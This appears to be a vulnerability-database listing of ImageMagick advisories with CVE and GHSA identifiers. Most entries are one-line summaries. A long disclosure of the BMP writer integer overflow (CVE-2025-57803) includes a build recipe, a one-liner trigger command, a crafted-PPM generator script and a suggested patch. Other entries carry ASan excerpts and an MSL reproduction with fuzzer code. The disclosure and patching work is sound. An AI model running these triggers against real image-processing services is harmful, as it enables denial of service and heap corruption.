VCID-emmr-15qp-vfah ImageMagick has Global Buffer Overflow (OOB Read) via Negative Pixel Index in UIL and XPM Writer The UIL and XPM image encoder do not validate the pixel index value returned by `GetPixelIndex()` before using it as an array subscript. In HDRI builds, `Quantum` is a floating-point type, so pixel index values can be negative. An attacker can craft an image with negative pixel index values to trigger a global buffer overflow read during conversion, leading to information disclosure or a process crash. ``` READ of size 1 at 0x55a8823a776e thread T0 #0 0x55a880d01e85 in WriteUILImage coders/uil.c:355 ``` ``` READ of size 1 at 0x55fa1c04c66e thread T0 #0 0x55fa1a9ee415 in WriteXPMImage coders/xpm.c:1135 ``` CVE-2026-25898
GHSA-vpxv-r9pg-7gpr
VCID-envn-rnvj-4yd2 ImageMagick: Memory leak in ReadYCBCRImage CVE-2017-15032
VCID-ep6g-44qy-5qd7 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14137
VCID-epd6-xsva-17ea Multiple vulnerabilities have been discovered in ImageMagick, the worst of which could lead to arbitrary code execution. CVE-2014-1947
VCID-ephb-spyf-c7d2 Multiple buffer overflows have been discovered in ImageMagick, which could potentially result in the execution of arbitrary code. CVE-2006-3743
VCID-eqr7-q1ga-8kcr ImageMagick: Null pointer dereference in DrawGetStrokeDashArray function in wand/drawing-wand.c CVE-2017-14505
VCID-es5w-6nr6-73cn security update CVE-2017-17504
VCID-et5y-g25w-4qay ImageMagick: Memory Leak in ReadPATTERNImage in coders/pattern.c CVE-2018-5246
VCID-evu2-cxt1-4qhq ImageMagick: incorrect handling of "previous" image in the JNG decoder CVE-2014-9847
VCID-ezcj-2yaf-rfhh ImageMagick: memory leak in coders/dps.c CVE-2019-16709
VCID-f1zu-xb4j-8qhp ImageMagick has a heap buffer over-read in its MAP image decoder A heap buffer over-read vulnerability exists in the MAP image decoder when processing crafted MAP files, potentially leading to crashes or unintended memory disclosure during image decoding. ``` ================================================================= ==4070926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000002b31 at pc 0x56517afbd910 bp 0x7ffc59e90000 sp 0x7ffc59e8fff0 READ of size 1 at 0x502000002b31 thread T0 ``` CVE-2026-25987
GHSA-42p5-62qq-mmh7
VCID-f6pf-5jnz-fkd1 ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride → heap buffer overflow ## Summary A 32-bit integer overflow in the BMP encoder’s scanline-stride computation collapses `bytes_per_line` (stride) to a tiny value while the per-row writer still emits `3 × width` bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. - **Impact:** Attacker-controlled heap out-of-bounds (OOB) write during conversion **to BMP**. - **Surface:** Typical upload → normalize/thumbnail → `magick ... out.bmp` workers. - **32-bit:** **Vulnerable** (reproduced with ASan). - **64-bit:** Safe from this specific integer overflow (IOF) by arithmetic, but still add product/size guards. - **Proposed severity:** **Critical 9.8** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). --- ## Scope & Affected Builds - **Project:** ImageMagick (BMP writer path, `WriteBMPImage` in `coders/bmp.c`). - **Commit under test:** `3fcd081c0278427fc0e8ac40ef75c0a1537792f7` - **Version string from the run:** `ImageMagick 7.1.2-0 Q8 i686 9bde76f1d:20250712` - **Architecture:** 32-bit i686 (**`sizeof(size_t) == 4`**) with ASan/UBSan. - **Note on other versions:** Any release/branch with the same stride arithmetic and row loop is likely affected on 32-bit. --- ## Root Cause (with code anchors) ### Stride computation (writer) ```c bytes_per_line = 4 * ((image->columns * bmp_info.bits_per_pixel + 31) / 32); ``` ### Per-row base and 24-bpp loop (writer) ```c q = pixels + ((ssize_t)image->rows - y - 1) * (ssize_t)bytes_per_line; for (x = 0; x < (ssize_t)image->columns; x++) { *q++ = B(...); *q++ = G(...); *q++ = R(...); // writes 3 * width bytes } ``` ### Allocation (writer) ```c pixel_info = AcquireVirtualMemory(image->rows, MagickMax(bytes_per_line, image->columns + 256UL) * sizeof(*pixels)); pixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info); ``` ### Dimension “caps” (insufficient) The writer rejects dimensions that don’t round-trip through `signed int`, but both overflow thresholds below are **≤ INT_MAX** on 32-bit, so the caps **do not prevent** the bug. --- ## Integer-Overflow Analysis (32-bit `size_t`) Stride formula for 24-bpp: ``` bytes_per_line = 4 * ((width * 24 + 31) / 32) ``` There are **two independent overflow hazards** on 32-bit: 1. **Stage-1 multiply+add** in `(width * 24 + 31)` Overflow iff `width > ⌊(0xFFFFFFFF − 31) / 24⌋ = 178,956,969` → at **width ≥ 178,956,970** the numerator wraps small before `/32`, producing a **tiny** `bytes_per_line`. 2. **Stage-2 final ×4** after the division Let `q = (width * 24 + 31) / 32`. Final `×4` overflows iff `q > 0x3FFFFFFF`. Solving gives **width ≥ 1,431,655,765 (0x55555555)**. Both thresholds are **below** `INT_MAX` (≈2.147e9), so “int caps” don’t help. **Mismatch predicate (guaranteed OOB when overflowed):** Per-row write for 24-bpp is `row_bytes = 3*width`. Safety requires `row_bytes ≤ bytes_per_line`. Under either overflow, `bytes_per_line` collapses → `3*width > bytes_per_line` holds → **OOB-write**. --- ## Concrete Demonstration Chosen width: **`W = 178,957,200`** (just over Stage-1 bound) - Stage-1: `24*W + 31 = 4,294,972,831 ≡ 0x0000159F (mod 2^32)` → **5535** - Divide by 32: `5535 / 32 = 172` - Multiply by 4: `bytes_per_line = 172 * 4 = **688** bytes` ← tiny stride - Per-row data (24-bpp): `row_bytes = 3*W = **536,871,600** bytes` - Allocation used: `MagickMax(688, W+256) = **178,957,456** bytes` - **Immediate OOB**: first row writes ~536MB into a 178MB region, starting at a base advanced by only 688 bytes. --- ## Observed Result (ASan excerpt) ``` ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490 WRITE of size 1 in WriteBMPImage coders/bmp.c:2309 ... allocated by: AcquireVirtualMemory MagickCore/memory.c:747 WriteBMPImage coders/bmp.c:2092 ``` - Binary: **ELF 32-bit i386**, Q8, non-HDRI - Resources set to permit execution of the writer path (defense-in-depth limits relaxed for repro) --- ## Exploitability & Risk - **Primitive:** Large, contiguous, attacker-controlled heap overwrite beginning at the scanline slot. - **Control:** Overwrite bytes are sourced from attacker-supplied pixels (e.g., crafted input image to be converted to BMP). - **Likely deployment:** Server-side, non-interactive conversion pipelines (UI:N). - **Outcome:** At minimum, deterministic crash (DoS). On many 32-bit allocators, well-understood heap shaping can escalate to **RCE**. **Note on 64-bit:** Without integer overflow, `bytes_per_line = 4 * ceil((3*width)/4) ≥ 3*width`, so the mismatch doesn’t arise. Still add product/size checks to prevent DoS and future refactors. --- ## Reproduction (copy-paste triager script) **Test Environment:** - `docker run -it --rm --platform linux/386 debian:11 bash` - Install deps: `apt-get update && apt-get install -y build-essential git autoconf automake libtool pkg-config python3` - Clone & checkout: ImageMagick `7.1.2-0` → commit `3fcd081c0278427f...` - Configure 32-bit Q8 non-HDRI with ASan/UBSan (summary): ```bash ./configure \ --host=i686-pc-linux-gnu \ --build=x86_64-pc-linux-gnu \ --disable-dependency-tracking \ --disable-silent-rules \ --disable-shared \ --disable-openmp \ --disable-docs \ --without-x \ --without-perl \ --without-magick-plus-plus \ --without-lqr \ --without-zstd \ --without-tiff \ --with-quantum-depth=8 \ --disable-hdri \ CFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ CXXFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ LDFLAGS="-fsanitize=address,undefined" make -j"$(nproc)" ``` - Runtime limits to exercise writer: ```bash export MAGICK_WIDTH_LIMIT=200000000 export MAGICK_HEIGHT_LIMIT=200000000 export MAGICK_TEMPORARY_PATH=/tmp export TMPDIR=/tmp export ASAN_OPTIONS="detect_leaks=0:malloc_context_size=20:alloc_dealloc_mismatch=0" ``` **One-liner trigger (no input file):** ```bash W=178957200 ./utilities/magick \ -limit width 200000000 -limit height 200000000 \ -limit memory 268435456 -limit map 0 -limit disk 200000000000 \ -limit thread 1 \ -size ${W}x1 xc:black -type TrueColor -define bmp:format=bmp3 BMP3:/dev/null ``` **Expected:** ASan heap-buffer-overflow in `WriteBMPImage` (will be provided in a private gist link). **Alternate PoC (raw PPM generator):** ```python #!/usr/bin/env python3 W, H, MAXV = 180_000_000, 1, 255 # W > 178,956,969 with open("huge.ppm", "wb") as f: f.write(f"P6\n{W} {H}\n{MAXV}\n".encode("ascii")) chunk = (b"\x41\x42\x43") * (1024*1024) remaining = 3 * W while remaining: n = min(remaining, len(chunk)) f.write(chunk[:n]); remaining -= n # Then: magick huge.ppm out.bmp ``` --- ## Proposed Severity - **Primary vector (server auto-convert):** `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` → **9.8 Critical** - **If strictly CLI/manual conversion:** `UI:R` → **8.8 High** --- ## Maintainer Pushbacks — Pre-empted - **“MagickMax makes allocation large.”** The row **base** advances by **overflowed `bytes_per_line`**, causing row overlap and eventual region exit regardless of total allocation size. - **“We’re 64-bit only.”** Code is still incorrect for 32-bit consumers/cross-compiles; also add product guards on 64-bit for correctness/DoS. - **“Resource policy blocks large images.”** That’s environment-dependent defense-in-depth; arithmetic must be correct. --- ## Remediation (Summary) Add checked arithmetic around stride computation and enforce a per-row invariant so that the number of bytes emitted per row (row_bytes) always fits within the computed stride (bytes_per_line). Guard multiplication/addition and product computations used for header fields and allocation sizes, and fail early with a clear WidthOrHeightExceedsLimit/ResourceLimitError when values exceed safe bounds. Concretely: - Validate width and bits_per_pixel before the stride formula to ensure (width*bpp + 31) cannot overflow a size_t. - Compute row_bytes for the chosen bpp and assert row_bytes <= bytes_per_line. - Bound rows * stride before allocating and ensure biSizeImage (DIB 32-bit) cannot overflow. A full suggested guarded implementation is provided in Appendix A — Full patch (for maintainers). --- ## Regression Tests to Include (PR-friendly) 1. **32-bit overflow repros** (with ASan): - `rows=1`, `width ≥ 178,956,970`, `bpp=24` → now cleanly errors. - `rows=2`, same bound → no row overlap; clean error. 2. **64-bit sanity:** Medium images (e.g., `8192×4096`, 24-bpp) round-trip; header’s `biSizeImage = rows * bytes_per_line`. 3. **Packed bpp (1/4/8):** Validate `row_bytes = (width*bpp+7)/8` (guarded), 4-pad, and **payload ≤ stride** holds. --- ## Attachments (private BMP_Package) Provided with report: README.md, poc_ppm_generator.py, repro_commands.sh, full_asan_bmp_crash.txt, appendix_a_patch_block.c. (Private gist link with package provided separately.) --- ## Disclosure & Coordination - **Reporter:** Lumina Mescuwa - **Tested on:** i686 Linux container (details in Repro) - **Timeline:** August 19th, 2025 --- ## Appendices ### Appendix A — Patch block tailored to  `bmp.c` **Where this hooks in (current code):** - Stride is computed here: `bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);` - Header uses `bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows);` - Allocation uses `AcquireVirtualMemory(image->rows, MagickMax(bytes_per_line, image->columns+256UL)*sizeof(*pixels));` - 24-bpp row loop writes pixels then zero-pads up to `bytes_per_line` (so the per-row slot size matters): `for (x=3L*(ssize_t)image->columns; x < (ssize_t)bytes_per_line; x++) *q++=0x00;` --- ## Suggested Patch (minimal surface, guards + invariant) I recommend this **in place of** the existing `bytes_per_line` assignment and the subsequent `bmp_info.image_size` / allocation block. Keep your macros and local variables as-is. ```c /* --- PATCH BEGIN: guarded stride, per-row invariant, and product checks --- */ /* 1) Guard the original stride arithmetic (preserve behavior, add checks). */ if (bmp_info.bits_per_pixel == 0 || (size_t)image->columns > (SIZE_MAX - 31) / (size_t)bmp_info.bits_per_pixel) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); size_t _tmp = (size_t)image->columns * (size_t)bmp_info.bits_per_pixel + 31; /* Divide first; then check the final ×4 won't overflow. */ _tmp /= 32; if (_tmp > (SIZE_MAX / 4)) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); bytes_per_line = 4 * _tmp; /* same formula as before, now checked */ /* 2) Compute the actual data bytes written per row for the chosen bpp. */ size_t row_bytes; if (bmp_info.bits_per_pixel == 1 || bmp_info.bits_per_pixel == 4 || bmp_info.bits_per_pixel == 8) { /* packed: ceil(width*bpp/8) */ if ((size_t)image->columns > (SIZE_MAX - 7) / (size_t)bmp_info.bits_per_pixel) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); row_bytes = (((size_t)image->columns * (size_t)bmp_info.bits_per_pixel) + 7) >> 3; } else { /* 16/24/32 bpp: (bpp/8) * width */ size_t bpp_bytes = (size_t)bmp_info.bits_per_pixel / 8; if (bpp_bytes == 0 || (size_t)image->columns > SIZE_MAX / bpp_bytes) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); row_bytes = bpp_bytes * (size_t)image->columns; } /* 3) Per-row safety invariant: the payload must fit the stride. */ if (row_bytes > bytes_per_line) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed"); /* 4) Guard header size and allocation products. */ if ((size_t)image->rows == 0) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); /* biSizeImage = rows * bytes_per_line (DIB field is 32-bit) */ if (bytes_per_line > 0xFFFFFFFFu / (size_t)image->rows) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); bmp_info.image_size = (unsigned int)(bytes_per_line * (size_t)image->rows); /* Allocation count = rows * stride_used, with existing MagickMax policy. */ size_t _stride = MagickMax(bytes_per_line, (size_t)image->columns + 256UL); if (_stride > SIZE_MAX / (size_t)image->rows) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed"); pixel_info = AcquireVirtualMemory((size_t)image->rows, _stride * sizeof(*pixels)); if (pixel_info == (MemoryInfo *) NULL) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed"); pixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info); /* Optional: keep zeroing aligned to computed header size. */ (void) memset(pixels, 0, (size_t) bmp_info.image_size); /* --- PATCH END --- */ ``` ### Why this is the right spot? - It **replaces** the unguarded stride line you currently have, without changing the algorithm (still `4*((W*bpp+31)/32)`).  - It **fixes the header** (`biSizeImage`) to be a checked product, instead of a potentially wrapped multiplication.  - It **guards allocation** where you presently allocate `rows × MagickMax(bytes_per_line, columns+256)`.  - The invariant `row_bytes ≤ bytes_per_line` ensures your 24-bpp emission loop (writes 3 bytes/pixel, then pads to `bytes_per_line`) can never exceed the per-row slot the code relies on.  --- ## Notes - **Behavior preserved**: The stride value for normal images is unchanged; only pathological integer states are rejected.  - **Header consistency**: `biSizeImage = rows * bytes_per_line` remains true by construction, but now cannot overflow a 32-bit DIB field.  - **Defensive alignment**: If you prefer, you can compute `bytes_per_line` as `((row_bytes + 3) & ~3U)`; it’s equivalent and may read clearer, but I kept the original formula with guards to minimize diff. A slightly larger “helpers” variant (with `safe_mul_size` / `safe_add_size` utilities) also comes to mind, but the block above is the tightest patch that closes the 32-bit IOF→OOB class without touching unrelated code paths. ### Appendix B — Arithmetic Worked Example (W=178,957,200) - `(24W + 31) mod 2^32 = 5535` - `bytes_per_line = 4 * (5535/32) = 688` - `row_bytes (24-bpp) = 536,871,600` - Allocation via `MagickMax = 178,957,456` → immediate row 0 out-of-bounds. ### Appendix C — Raw ASan Log (trimmed) ``` ================================================================= ==49178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490 WRITE of size 1 at 0x6eaac490 thread T0 #0 0xed2788 in WriteBMPImage coders/bmp.c:2309 #1 0x13da32c in WriteImage MagickCore/constitute.c:1342 #2 0x13dc657 in WriteImages MagickCore/constitute.c:1564 0x6eaac490 is located 0 bytes to the right of 178957456-byte region allocated by thread T0 here: #0 0x408e30ab in __interceptor_posix_memalign #1 0xd03305 in AcquireVirtualMemory MagickCore/memory.c:747 #2 0xecd597 in WriteBMPImage coders/bmp.c:2092 ``` CVE-2025-57803
GHSA-mxvv-97wh-cfmm
VCID-f9z9-h8bt-9bg7 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14138
VCID-fafu-jmw4-dqd9 security update CVE-2016-7519
VCID-fbta-m4mx-jfap Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12691
VCID-fd5j-v9vt-5fbu ImageMagick: memory exhaustion in function format8BIM causing denial of service CVE-2017-12806
VCID-fdav-btjk-pkbe ImageMagick: denial of service flaw in HDR file processing CVE-2015-8900
VCID-fds9-yfxw-gqgs Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13141
VCID-fduk-nxtd-uya3 security update CVE-2016-7513
VCID-fek5-ee6j-yqhv ImageMagick: heap-based buffer over-read in GetImageDepth function CVE-2017-11753
VCID-fnck-7mvx-hqc9 ImageMagick has a heap Buffer Over-read in its DJVU image format handler A heap Buffer Over-read vulnerability exists in the DJVU image format handler. The vulnerability occurs due to integer truncation when calculating the stride (row size) for pixel buffer allocation. The stride calculation overflows a 32-bit signed integer, resulting in an out-of-bounds memory reads. CVE-2026-27799
GHSA-r99p-5442-q2x2
VCID-fnmv-18fv-8kf3 ImageMagick: heap overflow in psd file CVE-2014-9824
VCID-fq6e-k53f-jugt ImageMagick: crash due to corrupted dib file CVE-2014-9845
VCID-fvny-qu61-fbf4 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which could lead to arbitrary code execution. CVE-2013-4298
VCID-fvws-m1ay-aud1 Multiple vulnerabilities have been found in GraphicsMagick, allowing remote attackers to execute arbitrary code or cause a Denial of Service condition. CVE-2009-1882
VCID-fx9z-gbbd-q7aq Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12876
VCID-fykb-qjuw-3qcj Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-10144
VCID-fzct-psgq-8fcb ImageMagick: Memory Leak in ReadPWPImage in coders/pwp.c CVE-2017-18008
VCID-fzhr-jhhc-m3ej ImageMagick: heap-based buffer overflow in WritePALMImage in coders/palm.c CVE-2020-25665
VCID-g1ct-6d28-g3ab ImageMagick: division by zero at MagickCore/enhance.c CVE-2020-27760
VCID-g1e8-3nnr-gqff ImageMagick: XML_PARSE_HUGE not properly restricted in coders/svg.c CVE-2019-18853
VCID-g2k2-5sn8-t7dz ImageMagick: NULL pointer dereference in ReadEnhMetaFile CVE-2017-15016
VCID-g41y-dv8u-3yf1 ImageMagick has Heap Buffer Overflow in WaveletDenoiseImage A crafted image could cause an out of bounds heap write inside the WaveletDenoiseImage method. When processing a crafted image with the -wavelet-denoise operation an out of bounds write can occur. ``` ================================================================= ==661320==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x503000002754 at pc 0x5ff45f82c92a bp 0x7fffb732b400 sp 0x7fffb732b3f0 WRITE of size 4 at 0x503000002754 thread T0 ``` CVE-2026-30936
GHSA-5ggv-92r5-cp4p
VCID-g49y-ec8g-f7h4 security update CVE-2016-10070
VCID-g679-q851-xub7 ImageMagick: stack-based buffer overflow in sixel encoder CVE-2026-32259
VCID-g6mw-mvbu-fbcs security update CVE-2017-16546
VCID-g6sp-5zkq-dkf9 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13061
VCID-g9xf-han8-6qgs ImageMagick: ImageMagick: Denial of Service via integer overflow in SVG image processing CVE-2025-69204
VCID-gaat-4369-hug5 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-10146
VCID-gc9p-4vdm-rbah ImageMagick: division by zero in MeanShiftImage in MagickCore/feature.c CVE-2019-14981
VCID-gdg8-aejn-83c4 ImageMagick: Policy bypass through path traversal allows reading restricted content despite secured policy ImageMagick’s path security policy is enforced on the raw filename string before the filesystem resolves it. As a result, a policy rule such as /etc/* can be bypassed by a path traversal. The OS resolves the traversal and opens the sensitive file, but the policy matcher only sees the unnormalized path and therefore allows the read. This enables local file disclosure (LFI) even when policy-secure.xml is applied. Actions to prevent reading from files have been taken. But it make sure writing is also not possible the following should be added to your policy: ``` <policy domain="path" rights="none" pattern="*../*"/> ``` And this will also be included in the project's more secure policies by default. CVE-2026-25965
GHSA-8jvj-p28h-9gm7
VCID-gdy9-dhzs-aqh9 security update CVE-2016-7530
VCID-ge69-ta6r-e3cj ImageMagick: crash in dpx file handler CVE-2014-9810
VCID-gf8v-mmd7-hqag ImageMagick: outside the range of representable values of type 'unsigned int' at coders/bmp.c CVE-2020-27772
VCID-ghqa-k8ma-tfcs security update CVE-2016-7521
VCID-gmm9-wk5j-gfh4 ImageMagick: a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c CVE-2019-13134
VCID-gp36-v664-vuh2 ImageMagick: outside the range of representable values of type 'unsigned long long' at coders/txt.c CVE-2020-27758
VCID-gq8m-6nq9-4bcq Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13145
VCID-gqgz-418x-skd3 ImageMagick: NULL pointer dereference in GetOpenCLCachedFilesDirectory function in magick/opencl.c CVE-2017-18209
VCID-gqky-zdxn-e3gd Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13140
VCID-gs3p-hzxs-kfcq ImageMagick: Char outside of range in coders/rle.c CVE-2017-7606
VCID-gx9p-3qdr-ebgw ImageMagick: Missing checks in the ReadOneJNGImage function CVE-2017-9142
VCID-h221-qd8d-tqa5 ImageMagick has a NULL pointer dereference in MSL parser via <comment> tag before image load ## Summary NULL pointer dereference in MSL (Magick Scripting Language) parser when processing `<comment>` tag before any image is loaded. ## Version - ImageMagick 7.x (tested on current main branch) - Commit: HEAD ## Steps to Reproduce ### Method 1: Using ImageMagick directly ```bash magick MSL:poc.msl out.png ``` ### Method 2: Using OSS-Fuzz reproduce ```bash python3 infra/helper.py build_fuzzers imagemagick python3 infra/helper.py reproduce imagemagick msl_fuzzer poc.msl ``` Or run the fuzzer directly: ```bash ./msl_fuzzer poc.msl ``` ## Expected Behavior ImageMagick should handle the malformed MSL gracefully and return an error message. ## Actual Behavior ``` convert: MagickCore/property.c:297: MagickBooleanType DeleteImageProperty(Image *, const char *): Assertion `image != (Image *) NULL' failed. Aborted ``` ## Root Cause Analysis In `coders/msl.c:7091`, `MSLEndElement()` calls `DeleteImageProperty()` on `msl_info->image[n]` when handling the `</comment>` end tag without checking if the image is NULL: ```c if (LocaleCompare((const char *) tag,"comment") == 0 ) { (void) DeleteImageProperty(msl_info->image[n],"comment"); // No NULL check ... } ``` When `<comment>` appears before any `<read>` operation, `msl_info->image[n]` is NULL, causing the assertion failure in `DeleteImageProperty()` at `property.c:297`. ## Impact - **DoS**: Crash via assertion failure (debug builds) or NULL pointer dereference (release builds) - **Affected**: Any application using ImageMagick to process user-supplied MSL files ## Fuzzer This issue was discovered using a custom MSL fuzzer: ```cpp #include <cstdint> #include <Magick++/Blob.h> #include <Magick++/Image.h> #include "utils.cc" extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if (IsInvalidSize(Size)) return(0); try { const Magick::Blob blob(Data, Size); Magick::Image image; image.magick("MSL"); image.fileName("MSL:"); image.read(blob); } catch (Magick::Exception) { } return(0); } ``` This issue was found by Team FuzzingBrain @ Texas A&M University CVE-2026-23952
GHSA-5vx3-wx4q-6cj8
VCID-h6hy-g7da-1yg4 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2023-34153
VCID-h6ps-ukb8-qfa9 ImageMagick: memory leaks in coders/msl.c CVE-2017-17934
VCID-h78w-2n4r-8qfh Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-6491
VCID-h7em-v8x6-63e3 ImageMagick: heap-based buffer overflow in PopShortPixel in MagickCore/quantum-private.h CVE-2020-25664
VCID-h8cp-df76-c3dz ImageMagick: NULL pointer dereference in LogOpenCLBuildFailure function in MagickCore/opencl.c CVE-2017-18250
VCID-hc1j-dabv-pyge security update CVE-2016-7517
VCID-hcjv-e7jt-nbbp security update CVE-2017-17499
VCID-hcxd-bker-sqc1 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-11640
VCID-hgfv-dtsx-hbdx security update CVE-2016-7525
VCID-hmcd-f6k1-kkd4 Multiple vulnerabilities have been discovered in ImageMagick, possibly resulting in arbitrary code execution or a Denial of Service. CVE-2007-4987
VCID-hnhy-ksua-juam ImageMagick: crash on corrupted viff file CVE-2014-9813
VCID-hrrw-ufje-akg5 ImageMagick: processing crafted file leads to division by zero CVE-2021-20176
VCID-hry9-mkha-nfct security update CVE-2017-11170
VCID-huhv-jxyu-jygx security update CVE-2016-7535
VCID-hwcd-dj3f-guay ImageMagick: outside the range of representable values of type 'unsigned char' at coders/hdr.c CVE-2020-27762
VCID-hx15-dy4p-uycu security flaw CVE-2005-0759
VCID-hz8y-hdp6-t3bx ImageMagick: Integer truncation vulnerability in coders/pict.c CVE-2015-8896
VCID-hzr4-8x4m-87cy ImageMagick: Memory leak in the function ReadVIPSImage CVE-2017-14684
VCID-j1hu-4c4d-ske6 Insufficient boundary check in ImageMagick's SGIDecode() CVE-2006-5868
VCID-j1jt-g5m8-ffbh Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13059
VCID-j559-5amz-4qff security update CVE-2016-7523
VCID-j8rp-wchj-qfhz ImageMagick: denial of service flaw in MIFF file processing CVE-2015-8901
VCID-jbhc-41ed-guap ImageMagick: Memory leak in ReadYUVImage CVE-2017-15033
VCID-jbt4-qpnp-yqdm security update CVE-2016-7518
VCID-jcjk-s89c-mbbm ImageMagick: Invalid MSL <map> can result in a use after free The MSL interpreter crashes when processing a invalid `<map>` element that causes it to use an image after it has been freed. CVE-2026-26983
GHSA-w8mw-frc6-r7m8
VCID-jcmt-5fes-jug2 ImageMagick: File descriptor leak in libmagickcore CVE-2017-6502
VCID-je5t-8uuq-ekdk ImageMagick: Memory exhaustion in the function ReadPSDImage CVE-2017-12563
VCID-je9u-1h5v-hbct ImageMagick: heap overflow in palm files CVE-2014-9819
VCID-jhk3-xpvd-xbfj security update CVE-2016-7533
VCID-jjzy-ch18-qkfp ImageMagick: Memory leak in ReadMAGICKImage function CVE-2017-11752
VCID-jkdz-rbkr-pygc ImageMagick: Memory leak in WriteINLINEImage function in coders/inline.c CVE-2017-12666
VCID-jn3z-marg-3qgz ImageMagick: direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value CVE-2019-13296
VCID-jpxf-qevp-kycp ImageMagick: division by zero in MagickCore/colorspace-private.h CVE-2020-27750
VCID-jqv2-v42r-7ybf ImageMagick: denial of service in ReadXWDImage in coders/xwd.c in the XWD image parsing component CVE-2019-11472
VCID-jtkv-nvan-jbag ImageMagick has Integer Overflow in BMP Decoder (ReadBMP) CVE-2025-57803 claims to be patched in ImageMagick 7.1.2-2, but **the fix is incomplete and ineffective**. The latest version **7.1.2-5 remains vulnerable** to the same integer overflow attack. The patch added `BMPOverflowCheck()` but placed it **after** the overflow occurs, making it useless. A malicious 58-byte BMP file can trigger AddressSanitizer crashes and DoS. **Affected Versions:** - ImageMagick < 7.1.2-2 (originally reported) - **ImageMagick 7.1.2-2 through 7.1.2-5 (incomplete patch)** **Platform and Configuration Requirements:** - 32-bit systems ONLY (i386, i686, armv7l, etc.) - Requires `size_t = 4 bytes`. (64-bit systems are **NOT vulnerable** (size_t = 8 bytes)) - Requires modified resource limits: The default `width`, `height`, and `area` limits must have been manually increased (Systems using default ImageMagick resource limits are **NOT vulnerable**). --- CVE-2025-62171
GHSA-9pp9-cfwx-54rm
VCID-jume-bjh7-f3hr security update CVE-2017-11352
VCID-jvq6-xjbu-fkb9 ImageMagick: Infinite loop vulnerability when parsing a PCD file When a PCD file does not contain a valid marker, the DecodeImage() function becomes trapped in an infinite loop while searching for the marker, causing the program to become unresponsive and continuously consume CPU resources, ultimately leading to system resource exhaustion and denial of service. CVE-2026-24485
GHSA-pqgj-2p96-rx85
VCID-jxwd-tm1k-yqa2 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13132
VCID-jz9p-mte7-vfb3 ImageMagick: Memory leak in the formatIPTCfromBuffer function in coders/meta.c CVE-2018-16750
VCID-k1pr-h6c7-2fgp Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12427
VCID-k1v6-jp8s-pye7 ImageMagick: Memory leak in the lite_font_map() function CVE-2017-11534
VCID-k4w2-craz-13b9 ImageMagick: overflow in rle file CVE-2014-9846
VCID-k6ar-hru3-hygu ImageMagick: heap overflow in pict file CVE-2014-9834
VCID-k7ku-8uya-kbeu Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13146
VCID-karw-d7ee-3yhs ImageMagick: Memory leak in the ReadDCMImage function CVE-2017-8346
VCID-kd82-724m-77h8 security update CVE-2018-12599
